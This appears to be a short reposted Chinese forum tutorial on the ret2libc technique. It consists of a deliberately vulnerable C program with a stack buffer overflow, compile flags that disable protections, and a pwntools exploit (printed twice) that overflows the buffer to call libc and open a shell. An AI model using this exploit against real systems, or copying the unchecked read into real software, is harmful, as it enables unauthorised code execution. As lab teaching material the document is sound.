1
什么是Ret2libc 技术
2
举例
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void vulnerable_function()
{
char buf[128];
read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv)
{
vulnerable_function();
write(STDOUT_FILENO, "Hello, World\n", 13);
}
gcc -m32 -fno-stack-protector -no-pie -o test test.c
from pwn import *
p = process('./test')
print 'pid' + str(proc.pidof(p))
ret=0x56556226
a = 0xf7e0a830
b = 0xf7f57352
payload = 'a'*140 + p32(a) + p32(ret) + p32(b)
pause()
p.send(payload)
p.interactive()
from pwn import *
p = process('./test')
print 'pid' + str(proc.pidof(p))
ret=0x56556226
a = 0xf7e0a830
b = 0xf7f57352
payload = 'a'*140 + p32(a) + p32(ret) + p32(b)
pause()
p.send(payload)
p.interactive()
END
看雪ID:天象独行
https://bbs.pediy.com/user-home-911429.htm
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!